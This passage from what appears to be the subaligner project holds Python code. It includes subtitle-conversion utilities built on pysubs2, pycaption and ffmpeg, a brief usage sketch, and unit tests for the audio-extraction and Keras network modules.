import cchardet
from pycaption import (
CaptionConverter,
SRTWriter,
SRTReader,
DFXPWriter,
DFXPReader,
SAMIWriter,
SAMIReader,
)
from typing import Optional, TextIO, BinaryIO, Union, Callable, Any, Tuple
from .exception import TerminalException
from subaligner.lib.to_srt import STL, SRT
class Utils(object):
"""Utility functions
"""
FFMPEG_BIN = os.getenv("FFMPEG_PATH") or os.getenv("ffmpeg_path") or "ffmpeg"
@staticmethod
def srt2ttml(srt_file_path: str, ttml_file_path: Optional[str] = None) -> None:
"""Convert SubRip subtitles to TTML subtitles.
Arguments:
srt_file_path {string} -- The path to the SubRip file.
ttml_file_path {string} -- The path to the TTML file.
"""
file: Union[TextIO, BinaryIO]
converter = CaptionConverter()
encoding = Utils.detect_encoding(srt_file_path)
with open(srt_file_path, "r", encoding=encoding) as file:
converter.read(file.read(), SRTReader())
if ttml_file_path is None:
ttml_file_path = srt_file_path.replace(".srt", ".xml")
with open(ttml_file_path, "wb") as file:
file.write(converter.write(DFXPWriter()).encode(encoding))
@staticmethod
def ttml2srt(ttml_file_path: str, srt_file_path: Optional[str] = None) -> None:
"""Convert TTML subtitles to SubRip subtitles.
Arguments:
ttml_file_path {string} -- The path to the TTML file.
srt_file_path {string} -- The path to the SubRip file.
"""
file: Union[TextIO, BinaryIO]
converter = CaptionConverter()
encoding = Utils.detect_encoding(ttml_file_path)
with open(ttml_file_path, "r", encoding=encoding) as file:
converter.read(file.read(), DFXPReader())
if srt_file_path is None:
srt_file_path = ttml_file_path.replace(".xml", ".srt")
with open(srt_file_path, "wb") as file:
file.write(converter.write(SRTWriter()).encode(encoding))
@staticmethod
def srt2vtt(srt_file_path: str, vtt_file_path: Optional[str] = None, timeout_secs: int = 30) -> None:
"""Convert SubRip subtitles to WebVTT subtitles.
Arguments:
srt_file_path {string} -- The path to the SubRip file.
vtt_file_path {string} -- The path to the WebVTT file.
timeout_secs {int} -- The timeout in seconds on conversion {default: 30}.
"""
_vtt_file_path = srt_file_path.replace(".srt", ".vtt") if vtt_file_path is None else vtt_file_path
encoding = Utils.detect_encoding(srt_file_path)
command = "{0} -y -sub_charenc {1} -i {2} -f webvtt {3}".format(Utils.FFMPEG_BIN, encoding, srt_file_path, _vtt_file_path)
timeout_msg = "Timeout on converting SubRip to WebVTT: {}".format(srt_file_path)
error_msg = "Cannot convert SubRip to WebVTT: {}".format(srt_file_path)
def _callback(returncode: int, std_err: str) -> None:
if returncode != 0:
raise TerminalException(
"Cannot convert SubRip to WebVTT: {} with error {}".format(
srt_file_path, std_err
)
)
Utils.remove_trailing_newlines(_vtt_file_path, encoding)
Utils.__run_command(command, timeout_secs, timeout_msg, error_msg, _callback)
@staticmethod
def vtt2srt(vtt_file_path: str, srt_file_path: Optional[str] = None, timeout_secs: int = 30) -> None:
"""Convert WebVTT subtitles to SubRip subtitles.
Arguments:
vtt_file_path {string} -- The path to the WebVTT file.
srt_file_path {string} -- The path to the SubRip file.
timeout_secs {int} -- The timeout in seconds on conversion {default: 30}.
"""
_srt_file_path = vtt_file_path.replace(".vtt", ".srt") if srt_file_path is None else srt_file_path
encoding = Utils.detect_encoding(vtt_file_path)
command = "{0} -y -sub_charenc {1} -i {2} -f srt {3}".format(Utils.FFMPEG_BIN, encoding, vtt_file_path, _srt_file_path)
timeout_msg = "Timeout on converting WebVTT to SubRip: {}".format(vtt_file_path)
error_msg = "Cannot convert WebVTT to SubRip: {}".format(vtt_file_path)
def _callback(returncode: int, std_err: str) -> None:
if returncode != 0:
raise TerminalException(
"Cannot convert WebVTT to SubRip: {} with error {}".format(
vtt_file_path, std_err
)
)
Utils.remove_trailing_newlines(_srt_file_path, encoding)
Utils.__run_command(command, timeout_secs, timeout_msg, error_msg, _callback)
@staticmethod
def srt2ass(srt_file_path: str, ass_file_path: Optional[str] = None) -> None:
"""Convert SubRip subtitles to Advanced SubStation Alpha v4.0+ subtitles.
Arguments:
srt_file_path {string} -- The path to the SubRip file.
ass_file_path {string} -- The path to the ASS file.
"""
new_ass_file_path, encoding = Utils.__convert_subtitle(srt_file_path, "srt", ass_file_path, "ass", "ass")
Utils.remove_trailing_newlines(new_ass_file_path, encoding)
@staticmethod
def ass2srt(ass_file_path: str, srt_file_path: Optional[str] = None) -> None:
"""Convert Advanced SubStation Alpha v4.0+ subtitles to SubRip subtitles.
Arguments:
ass_file_path {string} -- The path to the ASS file.
srt_file_path {string} -- The path to the SubRip file.
"""
new_srt_file_path, encoding = Utils.__convert_subtitle(ass_file_path, "ass", srt_file_path, "srt", "srt")
Utils.remove_trailing_newlines(new_srt_file_path, encoding)
@staticmethod
def srt2ssa(srt_file_path: str, ssa_file_path: Optional[str] = None) -> None:
"""Convert SubRip subtitles to SubStation Alpha v4.0 subtitles.
Arguments:
srt_file_path {string} -- The path to the SubRip file.
ssa_file_path {string} -- The path to the SSA file.
"""
new_ssa_file_path, encoding = Utils.__convert_subtitle(srt_file_path, "srt", ssa_file_path, "ssa", "ssa")
Utils.remove_trailing_newlines(new_ssa_file_path, encoding)
@staticmethod
def ssa2srt(ssa_file_path: str, srt_file_path: Optional[str] = None) -> None:
"""Convert SubStation Alpha v4.0 subtitles to SubRip subtitles.
Arguments:
ssa_file_path {string} -- The path to the SSA file.
srt_file_path {string} -- The path to the SubRip file.
"""
new_srt_file_path, encoding = Utils.__convert_subtitle(ssa_file_path, "ssa", srt_file_path, "srt", "srt")
Utils.remove_trailing_newlines(new_srt_file_path, encoding)
@staticmethod
def srt2microdvd(srt_file_path: str, microdvd_file_path: Optional[str] = None, frame_rate: float = 25.0):
"""Convert SubRip subtitles to MicroDVD subtitles.
Arguments:
srt_file_path {string} -- The path to the SubRip file.
microdvd_file_path {string} -- The path to the MicroDVD file.
frame_rate {float} -- The frame rate for frame-based MicroDVD.
"""
new_microdvd_file_path, encoding = Utils.__convert_subtitle(srt_file_path, "srt", microdvd_file_path, "sub", "microdvd", frame_rate=frame_rate)
Utils.remove_trailing_newlines(new_microdvd_file_path, encoding)
@staticmethod
def microdvd2srt(microdvd_file_path: str, srt_file_path: Optional[str] = None) -> None:
"""Convert MicroDVD subtitles to SubRip subtitles.
Arguments:
            microdvd_file_path {string} -- The path to the MicroDVD file.
srt_file_path {string} -- The path to the SubRip file.
"""
new_srt_file_path, encoding = Utils.__convert_subtitle(microdvd_file_path, "sub", srt_file_path, "srt", "srt")
Utils.remove_trailing_newlines(new_srt_file_path, encoding)
@staticmethod
def srt2mpl2(srt_file_path: str, mpl2_file_path: Optional[str] = None) -> None:
"""Convert SubRip subtitles to MPL2 subtitles.
Arguments:
srt_file_path {string} -- The path to the SubRip file.
mpl2_file_path {string} -- The path to the MPL2 file.
"""
new_mpl2_file_path, encoding = Utils.__convert_subtitle(srt_file_path, "srt", mpl2_file_path, "txt", "mpl2")
Utils.remove_trailing_newlines(new_mpl2_file_path, encoding)
@staticmethod
def mpl22srt(mpl2_file_path: str, srt_file_path: Optional[str] = None) -> None:
"""Convert MPL2 subtitles to SubRip subtitles.
Arguments:
mpl2_file_path {string} -- The path to the MPL2 file.
srt_file_path {string} -- The path to the SubRip file.
"""
new_srt_file_path, encoding = Utils.__convert_subtitle(mpl2_file_path, "txt", srt_file_path, "srt", "srt")
Utils.remove_trailing_newlines(new_srt_file_path, encoding)
@staticmethod
def srt2tmp(srt_file_path: str, tmp_file_path: Optional[str] = None) -> None:
"""Convert SubRip subtitles to TMP subtitles.
Arguments:
srt_file_path {string} -- The path to the SubRip file.
tmp_file_path {string} -- The path to the TMP file.
"""
new_tmp_file_path, encoding = Utils.__convert_subtitle(srt_file_path, "srt", tmp_file_path, "tmp", "tmp")
Utils.remove_trailing_newlines(new_tmp_file_path, encoding)
@staticmethod
def tmp2srt(tmp_file_path: str, srt_file_path: Optional[str] = None) -> None:
"""Convert TMP subtitles to SubRip subtitles.
Arguments:
            tmp_file_path {string} -- The path to the TMP file.
            srt_file_path {string} -- The path to the SubRip file.
"""
new_srt_file_path, encoding = Utils.__convert_subtitle(tmp_file_path, "tmp", srt_file_path, "srt", "srt")
Utils.remove_trailing_newlines(new_srt_file_path, encoding)
@staticmethod
def srt2sami(srt_file_path: str, sami_file_path: Optional[str] = None) -> None:
"""Convert SubRip subtitles to SAMI subtitles.
Arguments:
srt_file_path {string} -- The path to the SubRip file.
sami_file_path {string} -- The path to the SAMI file.
"""
file: Union[TextIO, BinaryIO]
converter = CaptionConverter()
encoding = Utils.detect_encoding(srt_file_path)
with open(srt_file_path, "r", encoding=encoding) as file:
converter.read(file.read(), SRTReader())
if sami_file_path is None:
sami_file_path = srt_file_path.replace(".srt", ".smi")
with open(sami_file_path, "wb") as file:
file.write(converter.write(SAMIWriter()).encode(encoding))
@staticmethod
def sami2srt(sami_file_path: str, srt_file_path: Optional[str] = None) -> None:
"""Convert SAMI subtitles to SubRip subtitles.
Arguments:
sami_file_path {string} -- The path to the SAMI file.
srt_file_path {string} -- The path to the SubRip file.
"""
file: Union[TextIO, BinaryIO]
converter = CaptionConverter()
encoding = Utils.detect_encoding(sami_file_path)
with open(sami_file_path, "r", encoding=encoding) as file:
converter.read(file.read(), SAMIReader())
if srt_file_path is None:
srt_file_path = sami_file_path.replace(".smi", ".srt")
with open(srt_file_path, "wb") as file:
file.write(converter.write(SRTWriter()).encode(encoding))
Utils.remove_trailing_newlines(srt_file_path, encoding)
@staticmethod
def stl2srt(stl_file_path: str, srt_file_path: Optional[str] = None) -> None:
"""Convert EBU-STL subtitles to SubRip subtitles.
Arguments:
stl_file_path {string} -- The path to the EBU-STL file.
srt_file_path {string} -- The path to the SubRip file.
"""
encoding = Utils.detect_encoding(stl_file_path)
stl = STL(stl_file_path, True)
if srt_file_path is None:
srt_file_path = stl_file_path.replace(".stl", ".srt")
srt = SRT(srt_file_path)
for sub in stl:
(tci, tco, txt) = sub
srt.write(tci, tco, txt)
srt.file.close()
stl.file.close()
Utils.remove_trailing_newlines(srt_file_path, encoding)
@staticmethod
def extract_teletext_as_subtitle(ts_file_path: str, page_num: int, output_file_path: str, timeout_secs: int = 30) -> None:
"""Extract DVB Teletext from MPEG transport stream files and convert them into the output format.
Arguments:
ts_file_path {string} -- The path to the Transport Stream file.
page_num {int} -- The page number for the Teletext
output_file_path {string} -- The path to the output file.
timeout_secs {int} -- The timeout in seconds on extraction {default: 30}.
"""
command = "{0} -y -fix_sub_duration -txt_page {1} -txt_format text -i {2} {3}".format(Utils.FFMPEG_BIN, page_num, ts_file_path, output_file_path)
timeout_msg = "Timeout on extracting Teletext from transport stream: {} on page: {}".format(ts_file_path, page_num)
error_msg = "Cannot extract Teletext from transport stream: {} on page: {}".format(ts_file_path, page_num)
def _callback(returncode: int, std_err: str) -> None:
if returncode != 0:
raise TerminalException(
"Cannot extract Teletext from transport stream: {} on page: {} with error {}".format(
ts_file_path, page_num, std_err
)
)
Utils.remove_trailing_newlines(output_file_path, None)
Utils.__run_command(command, timeout_secs, timeout_msg, error_msg, _callback)
@staticmethod
def extract_matroska_subtitle(mkv_file_path: str, stream_index: int, output_file_path: str, timeout_secs: int = 30) -> None:
"""Extract subtitles from Matroska files and convert them into the output format.
Arguments:
mkv_file_path {string} -- The path to the Matroska file.
stream_index {int} -- The index of the subtitle stream
output_file_path {string} -- The path to the output file.
timeout_secs {int} -- The timeout in seconds on extraction {default: 30}.
"""
command = "{0} -y -i {1} -map 0:s:{2} {3}".format(Utils.FFMPEG_BIN, mkv_file_path, stream_index, output_file_path)
timeout_msg = "Timeout on extracting the subtitle from file: {} with stream index: {}".format(mkv_file_path, stream_index)
error_msg = "Cannot extract the subtitle from file: {} with stream index: {}".format(mkv_file_path, stream_index)
def _callback(returncode: int, std_err: str) -> None:
if returncode != 0:
raise TerminalException(
"Cannot extract the subtitle from file: {} with stream index: {} with error {}".format(
mkv_file_path, stream_index, std_err
)
)
Utils.remove_trailing_newlines(output_file_path, None)
Utils.__run_command(command, timeout_secs, timeout_msg, error_msg, _callback)
@staticmethod
def suppress_lib_logs() -> None:
import os
import logging
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "3"
os.environ["TF_CPP_MIN_VLOG_LEVEL"] = "0"
logging.getLogger("tensorflow").disabled = True
@staticmethod
def remove_trailing_newlines(source_file_path: str, encoding: Optional[str], target_file_path: Optional[str] = None) -> None:
with open(source_file_path, "r", encoding=encoding) as file:
content = file.read()
if target_file_path is not None:
with open(target_file_path, "w", encoding=encoding) as file:
file.write(content.rstrip())
else:
with open(source_file_path, "w", encoding=encoding) as file:
file.write(content.rstrip())
@staticmethod
def download_file(remote_file_url: str, local_file_path: str) -> None:
r = requests.get(remote_file_url, verify=True, stream=True)
r.raw.decode_content = True
with open(local_file_path, "wb") as file:
shutil.copyfileobj(r.raw, file)
@staticmethod
def contains_embedded_subtitles(video_file_path: str, timeout_secs: int = 30) -> bool:
"""Detect if the input video contains embedded subtitles.
Arguments:
video_file_path {string} -- The path to the video file.
timeout_secs {int} -- The timeout in seconds on extraction {default: 30}.
Returns:
bool -- True if the video contains embedded subtitles or False otherwise.
"""
command = "{0} -y -i {1} -c copy -map 0:s -f null - -v 0 -hide_banner".format(Utils.FFMPEG_BIN, video_file_path)
timeout_msg = "Timeout on detecting embedded subtitles from file: {}".format(video_file_path)
error_msg = "Embedded subtitle detection failed for file: {}".format(video_file_path)
def _callback(returncode: int, std_err: str) -> bool:
return returncode == 0
return Utils.__run_command(command, timeout_secs, timeout_msg, error_msg, _callback)
@staticmethod
def detect_encoding(subtitle_file_path: str) -> str:
"""Detect the encoding of the subtitle file.
Arguments:
subtitle_file_path {string} -- The path to the subtitle file.
Returns:
            string -- The name of the detected encoding (None if it cannot be detected)
"""
with open(subtitle_file_path, "rb") as file:
raw = b"".join(file.readlines())
detected = cchardet.detect(raw)
detected = detected or {}
return detected["encoding"] if "encoding" in detected else None
@staticmethod
def __convert_subtitle(source_file_path: str, source_ext: str, target_file_path: Optional[str], target_ext: str, format: str, frame_rate: Optional[float] = None) -> Tuple[str, str]:
encoding = Utils.detect_encoding(source_file_path)
subs = pysubs2.load(source_file_path, encoding=encoding)
new_target_file_path = source_file_path.replace(".%s" % source_ext, ".%s" % target_ext) if target_file_path is None else target_file_path
if frame_rate is None:
subs.save(new_target_file_path, encoding=encoding, format_=format)
else:
subs.save(new_target_file_path, encoding=encoding, format_=format, fps=frame_rate)
return new_target_file_path, encoding
@staticmethod
def __run_command(command: str, timeout_secs: int, timeout_msg: str, error_msg: str, callback: Callable[[int, str], Any]) -> Any:
with subprocess.Popen(
command.split(),
shell=False,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True,
universal_newlines=True,
bufsize=1,
) as process:
try:
_, std_err = process.communicate(timeout=timeout_secs)
return callback(process.returncode, std_err)
except subprocess.TimeoutExpired as te:
process.kill()
raise TerminalException(timeout_msg) from te
except Exception as e:
process.kill()
if isinstance(e, TerminalException):
raise e
else:
raise TerminalException(error_msg) from e
finally:
os.system("stty sane")
```
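A short usage sketch for the conversion helpers above; the file names are placeholders, and the conversions that shell out (`srt2vtt`, `vtt2srt`, the extraction helpers) require ffmpeg to be available on PATH or via the FFMPEG_PATH environment variable:

```python
# Illustrative calls only -- the paths are placeholders, not repository files.
from subaligner.utils import Utils

print(Utils.detect_encoding("episode.srt"))  # e.g. 'UTF-8', or None if unknown
Utils.srt2vtt("episode.srt")                 # writes episode.vtt via ffmpeg
Utils.srt2ass("episode.srt")                 # writes episode.ass via pysubs2
```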
#### File: tests/subaligner/test_media_helper.py
```python
import unittest
import os
import pysrt
import subprocess
from subaligner.exception import TerminalException, NoFrameRateException
from subaligner.media_helper import MediaHelper as Undertest
from mock import patch, Mock
class MediaHelperTests(unittest.TestCase):
def setUp(self):
self.__video_file_path = os.path.join(
os.path.dirname(os.path.abspath(__file__)), "resource/test.mp4"
)
self.__subtitle_file_path = os.path.join(
os.path.dirname(os.path.abspath(__file__)), "resource/test.srt"
)
self.__test_audio_path = os.path.join(
os.path.dirname(os.path.abspath(__file__)), "resource/test.wav"
)
self.__audio_file_path = None
self.__segment_paths = []
def tearDown(self):
if self.__audio_file_path is not None:
os.remove(self.__audio_file_path) if os.path.isfile(
self.__audio_file_path
) else None
if self.__segment_paths is not None:
for segment_path in self.__segment_paths:
os.remove(segment_path) if os.path.isfile(segment_path) else None
def test_extract_audio_wav(self):
self.__audio_file_path = Undertest.extract_audio(
self.__video_file_path, True, 16000
)
self.assertTrue(os.path.isfile(self.__audio_file_path))
def test_extract_audio_aac(self):
self.__audio_file_path = Undertest.extract_audio(self.__video_file_path)
self.assertTrue(os.path.isfile(self.__audio_file_path))
def test_extract_audio_wav_from_start(self):
self.__audio_file_path = Undertest.extract_audio(
self.__video_file_path, True, 16000
)
segment_path, duration = Undertest.extract_audio_from_start_to_end(
self.__audio_file_path, "00:00:13,750"
)
self.assertTrue(os.path.isfile(segment_path))
self.__segment_paths.append(segment_path)
self.assertIsNone(duration)
def test_get_duration_in_seconds(self):
duration = Undertest.get_duration_in_seconds(
start="02:10:12,222", end="03:12:24,328"
)
self.assertEqual(3732.106, duration)
def test_get_duration_in_seconds_without_start(self):
duration = Undertest.get_duration_in_seconds(start=None, end="01:01:01,100")
self.assertEqual(3661.100, duration)
def test_extract_audio_wav_from_start_to_end(self):
self.__audio_file_path = Undertest.extract_audio(
self.__video_file_path, True, 16000
)
segment_path, duration = Undertest.extract_audio_from_start_to_end(
self.__audio_file_path, "00:00:13,750", "00:00:16,150"
)
self.assertTrue(os.path.isfile(segment_path))
self.__segment_paths.append(segment_path)
self.assertEqual(2.4, duration)
def test_get_audio_segment_starts_and_ends(self):
subs = pysrt.open(self.__subtitle_file_path, encoding="utf-8")
segment_starts, segment_ends, new_subs = Undertest.get_audio_segment_starts_and_ends(
subs
)
self.assertEqual(len(segment_starts), len(segment_ends))
self.assertEqual(len(segment_starts), len(new_subs))
for sub in new_subs:
self.assertIsInstance(sub, pysrt.SubRipFile)
def test_get_frame_rate(self):
self.assertEqual(24.0, Undertest.get_frame_rate(self.__video_file_path))
def test_throw_terminal_exception_on_bad_video(self):
try:
Undertest.extract_audio("bad_video_file_path", True, 16000)
except Exception as e:
self.assertTrue(isinstance(e, TerminalException))
self.assertFalse(os.path.exists("bad_video_file_path.mp4.wav"))
else:
self.fail("Should have thrown exception")
@patch("subprocess.Popen")
def test_throw_exception_on_extract_audio_with_error_code(self, mock_popen):
mock_popen.returncode.return_value = 1
mock_popen.communicate = Mock()
mock_popen.communicate.return_value = 1
try:
Undertest.extract_audio(self.__video_file_path)
except Exception as e:
self.assertTrue(mock_popen.communicate.called_with(180))
self.assertTrue(isinstance(e, TerminalException))
self.assertTrue("Cannot extract audio from video:" in str(e))
else:
self.fail("Should have thrown exception")
@patch("subprocess.Popen.communicate", side_effect=subprocess.TimeoutExpired("", 1.0))
def test_throw_exception_on_extract_audio_timeout(self, mock_communicate):
try:
Undertest.extract_audio(self.__video_file_path)
except Exception as e:
self.assertTrue(mock_communicate.called)
self.assertTrue(isinstance(e, TerminalException))
self.assertTrue("Timeout on extracting audio from video:" in str(e))
else:
self.fail("Should have thrown exception")
@patch("subprocess.Popen.communicate", side_effect=KeyboardInterrupt)
def test_throw_exception_on_extract_audio_interrupted(self, mock_communicate):
try:
Undertest.extract_audio(self.__video_file_path)
except Exception as e:
self.assertTrue(mock_communicate.called)
self.assertTrue(isinstance(e, TerminalException))
self.assertTrue("interrupted" in str(e))
else:
self.fail("Should have thrown exception")
@patch("subprocess.Popen.communicate", side_effect=Exception())
def test_throw_exception_on_vtt2srt_exception(self, mock_communicate):
try:
Undertest.extract_audio(self.__video_file_path)
except Exception as e:
self.assertTrue(mock_communicate.called)
self.assertTrue(isinstance(e, TerminalException))
self.assertTrue("Cannot extract audio from video:" in str(e))
else:
self.fail("Should have thrown exception")
@patch("subprocess.Popen.communicate", return_value=1)
def test_throw_exception_on_extract_partial_audio_with_error_code(self, mock_communicate):
try:
Undertest.extract_audio_from_start_to_end(
self.__test_audio_path, "00:00:13,750", "00:00:16,150"
)
except Exception as e:
self.assertTrue(mock_communicate.called)
self.assertTrue(isinstance(e, TerminalException))
self.assertTrue("Cannot clip audio:" in str(e))
else:
self.fail("Should have thrown exception")
@patch("subprocess.Popen.communicate", side_effect=subprocess.TimeoutExpired("", 1.0))
def test_throw_exception_on_extract_partial_audio_timeout(self, mock_communicate):
try:
Undertest.extract_audio_from_start_to_end(
self.__test_audio_path, "00:00:13,750", "00:00:16,150"
)
except Exception as e:
self.assertTrue(mock_communicate.called)
self.assertTrue(isinstance(e, TerminalException))
self.assertTrue("Timeout on extracting audio from audio:" in str(e))
else:
self.fail("Should have thrown exception")
@patch("subprocess.Popen.communicate", side_effect=Exception())
def test_throw_exception_on_extract_partial_audio_exception(self, mock_communicate):
try:
Undertest.extract_audio_from_start_to_end(
self.__test_audio_path, "00:00:13,750", "00:00:16,150"
)
except Exception as e:
self.assertTrue(mock_communicate.called)
self.assertTrue(isinstance(e, TerminalException))
self.assertTrue("Cannot clip audio:" in str(e))
else:
self.fail("Should have thrown exception")
@patch("subprocess.Popen.communicate", side_effect=KeyboardInterrupt)
def test_throw_exception_on_extract_partial_audio_interrupted(self, mock_communicate):
try:
Undertest.extract_audio_from_start_to_end(
self.__test_audio_path, "00:00:13,750", "00:00:16,150"
)
except Exception as e:
self.assertTrue(mock_communicate.called)
self.assertTrue(isinstance(e, TerminalException))
self.assertTrue("interrupted" in str(e))
else:
self.fail("Should have thrown exception")
def test_throw_no_frame_rate_exception_on_audio(self):
try:
Undertest.get_frame_rate(self.__test_audio_path)
except Exception as e:
self.assertTrue(isinstance(e, NoFrameRateException))
else:
self.fail("Should have thrown exception")
@patch("subprocess.Popen.communicate", return_value=1)
def test_throw_exception_on_get_frame_rate(self, mock_communicate):
try:
Undertest.get_frame_rate(self.__video_file_path)
except Exception as e:
self.assertTrue(mock_communicate.called)
self.assertTrue(isinstance(e, NoFrameRateException))
self.assertTrue("Cannot extract the frame rate from video:" in str(e))
else:
self.fail("Should have thrown exception")
@patch("subprocess.Popen.communicate", side_effect=subprocess.TimeoutExpired("", 1.0))
def test_throw_exception_on_get_frame_rate_timeout(self, mock_communicate):
try:
Undertest.get_frame_rate(self.__video_file_path)
except Exception as e:
self.assertTrue(mock_communicate.called)
self.assertTrue(isinstance(e, NoFrameRateException))
self.assertTrue("Timeout on extracting the frame rate from video:" in str(e))
else:
self.fail("Should have thrown exception")
@patch("subprocess.Popen.communicate", side_effect=Exception())
def test_throw_exception_on_get_frame_rate_exception(self, mock_communicate):
try:
Undertest.get_frame_rate(self.__video_file_path)
except Exception as e:
self.assertTrue(mock_communicate.called)
self.assertTrue(isinstance(e, NoFrameRateException))
self.assertTrue("Cannot extract the frame rate from video:" in str(e))
else:
self.fail("Should have thrown exception")
@patch("subprocess.Popen.communicate", side_effect=KeyboardInterrupt)
def test_throw_exception_on_get_frame_rate_interrupted(self, mock_communicate):
try:
Undertest.get_frame_rate(self.__video_file_path)
except Exception as e:
self.assertTrue(mock_communicate.called)
self.assertTrue(isinstance(e, TerminalException))
self.assertTrue("interrupted" in str(e))
else:
self.fail("Should have thrown exception")
if __name__ == "__main__":
unittest.main()
```
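The exception-path tests above all rely on the same pattern: `subprocess.Popen.communicate` is patched so the code under test hits a timeout, an error, or an interrupt without ffmpeg ever being invoked. Below is a minimal, self-contained sketch of that pattern; the command and the `RuntimeError` wrapper are illustrative stand-ins, not subaligner's own `MediaHelper` code.
```python
import subprocess
import sys
from unittest.mock import patch  # the tests above use the standalone "mock" package instead


def communicate_or_raise():
    # A stand-in for the ffmpeg calls made by the media helper under test.
    process = subprocess.Popen(
        [sys.executable, "--version"], stdout=subprocess.PIPE, stderr=subprocess.PIPE
    )
    try:
        return process.communicate(timeout=30)
    except subprocess.TimeoutExpired:
        process.kill()
        raise RuntimeError("Timeout on extracting audio from audio")


with patch("subprocess.Popen.communicate", side_effect=subprocess.TimeoutExpired("cmd", 1.0)):
    try:
        communicate_or_raise()
    except RuntimeError as error:
        print(error)  # Timeout on extracting audio from audio
```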
#### File: tests/subaligner/test_network.py
```python
import unittest
import os
import pickle
import shutil
import h5py
import numpy as np
from mock import patch
from tensorflow.keras.models import Model
from subaligner.hyperparameters import Hyperparameters
from subaligner.exception import TerminalException
from subaligner.network import Network as Undertest
class NetworkTests(unittest.TestCase):
def setUp(self):
self.__hyperparameters = Hyperparameters()
self.__hyperparameters.epochs = 1
self.__model_dir = os.path.join(
os.path.dirname(os.path.abspath(__file__)), "resource/models/training/model"
)
self.__weights_dir = os.path.join(
os.path.dirname(os.path.abspath(__file__)), "resource/models/training/weights"
)
self.__train_data = os.path.join(
os.path.dirname(os.path.abspath(__file__)), "resource/train_data"
)
self.__labels = os.path.join(
os.path.dirname(os.path.abspath(__file__)), "resource/labels"
)
self.__training_dump = os.path.join(
os.path.dirname(os.path.abspath(__file__)), "resource/training_dump.hdf5"
)
self.__resource_tmp = os.path.join(
os.path.dirname(os.path.abspath(__file__)), "resource/tmp"
)
if os.path.exists(self.__resource_tmp):
shutil.rmtree(self.__resource_tmp)
os.mkdir(self.__resource_tmp)
def tearDown(self):
for file in os.listdir(self.__model_dir):
os.remove(os.path.join(self.__model_dir, file)) if not file.endswith(
".hdf5"
) else None
shutil.rmtree(self.__resource_tmp)
Undertest.reset()
def test_suppressed_init(self):
self.assertRaises(
AssertionError, Undertest, "guess", (2, 20), "lstm", None, None
)
def test_get_from_model(self):
model_filepath = "{}/{}".format(self.__model_dir, "model.hdf5")
network = Undertest.get_from_model(model_filepath, self.__hyperparameters)
self.assertEqual((2, 20), network.input_shape)
self.assertEqual("unknown", network.n_type)
def test_save_model_and_weights(self):
model_filepath = "{}/{}".format(self.__model_dir, "model.hdf5")
weights_filepath = "{}/{}".format(self.__weights_dir, "weights.hdf5")
Undertest.save_model_and_weights(
model_filepath,
weights_filepath,
"{}/{}".format(self.__resource_tmp, "model_combined.hdf5"),
)
self.assertEqual((2, 20), Undertest.get_from_model(model_filepath, self.__hyperparameters).input_shape)
def test_input_shape(self):
network = Undertest.get_network((2, 20), self.__hyperparameters)
self.assertEqual((2, 20), network.input_shape)
def test_create_lstm_network(self):
network = Undertest.get_network((2, 20), self.__hyperparameters)
self.assertEqual("lstm", network.n_type)
def test_create_bi_lstm_network(self):
self.__hyperparameters.network_type = "bi_lstm"
network = Undertest.get_network((2, 20), self.__hyperparameters)
self.assertEqual("bi_lstm", network.n_type)
def test_create_conv_1d_network(self):
self.__hyperparameters.network_type = "conv_1d"
network = Undertest.get_network((2, 20), self.__hyperparameters)
self.assertEqual("conv_1d", network.n_type)
def test_summary(self):
network = Undertest.get_network((2, 20), self.__hyperparameters)
        self.assertTrue(network.summary is None)  # likely because Keras Model.summary() prints to stdout and returns None
def test_get_predictions(self):
network = Undertest.get_from_model("{}/model.hdf5".format(self.__model_dir), self.__hyperparameters)
with open(self.__train_data, "rb") as file:
train_data = pickle.load(file)
self.assertEqual((11431, 1), network.get_predictions(train_data, "{}/weights.hdf5".format(self.__weights_dir)).shape)
def test_load_model_and_weights(self):
network_old = Undertest.get_network((2, 20), self.__hyperparameters)
weights_old = network_old._Network__model.get_weights()
network_new = Undertest.load_model_and_weights("{}/model.hdf5".format(self.__model_dir), "{}/weights.hdf5".format(self.__weights_dir),
self.__hyperparameters)
weights_new = network_new._Network__model.get_weights()
self.assertFalse(np.array_equal(weights_old, weights_new))
def test_fit_lstm_and_get_history(self):
network = Undertest.get_network((2, 20), self.__hyperparameters)
model_filepath = "{}/model.hdf5".format(self.__resource_tmp)
weights_filepath = "{}/weights.hdf5".format(self.__resource_tmp)
with open(self.__train_data, "rb") as file:
train_data = pickle.load(file)
with open(self.__labels, "rb") as file:
labels = pickle.load(file)
val_loss, val_acc = network.fit_and_get_history(
train_data,
labels,
model_filepath,
weights_filepath,
self.__resource_tmp,
"training.log",
False,
)
self.assertEqual(list, type(val_loss))
self.assertEqual(list, type(val_acc))
def test_fit_bi_lstm_and_get_history(self):
self.__hyperparameters.network_type = "bi_lstm"
network = Undertest.get_network((2, 20), self.__hyperparameters)
model_filepath = "{}/model.hdf5".format(self.__resource_tmp)
weights_filepath = "{}/weights.hdf5".format(self.__resource_tmp)
with open(self.__train_data, "rb") as file:
train_data = pickle.load(file)
with open(self.__labels, "rb") as file:
labels = pickle.load(file)
val_loss, val_acc = network.fit_and_get_history(
train_data,
labels,
model_filepath,
weights_filepath,
self.__resource_tmp,
"training.log",
False,
)
self.assertEqual(list, type(val_loss))
self.assertEqual(list, type(val_acc))
def test_resume_and_get_history(self):
self.__hyperparameters.epochs = 2
network = Undertest.get_network((2, 20), self.__hyperparameters)
model_filepath = "{}/model.hdf5".format(self.__resource_tmp)
weights_filepath = "{}/weights.hdf5".format(self.__resource_tmp)
with open(self.__train_data, "rb") as file:
train_data = pickle.load(file)
with open(self.__labels, "rb") as file:
labels = pickle.load(file)
_, _ = network.fit_and_get_history(
train_data,
labels,
model_filepath,
weights_filepath,
self.__resource_tmp,
"{}/training.log".format(self.__resource_tmp),
False,
)
self.__hyperparameters.epochs = 3
val_loss, val_acc = network.fit_and_get_history(
train_data,
labels,
model_filepath,
weights_filepath,
self.__resource_tmp,
"{}/training.log".format(self.__resource_tmp),
True,
)
self.assertEqual(list, type(val_loss))
self.assertEqual(list, type(val_acc))
def test_exception_on_resume_with_no_extra_epochs(self):
self.__hyperparameters.epochs = 2
network = Undertest.get_network((2, 20), self.__hyperparameters)
model_filepath = "{}/model.hdf5".format(self.__resource_tmp)
weights_filepath = "{}/weights.hdf5".format(self.__resource_tmp)
with open(self.__train_data, "rb") as file:
train_data = pickle.load(file)
with open(self.__labels, "rb") as file:
labels = pickle.load(file)
_, _ = network.fit_and_get_history(
train_data,
labels,
model_filepath,
weights_filepath,
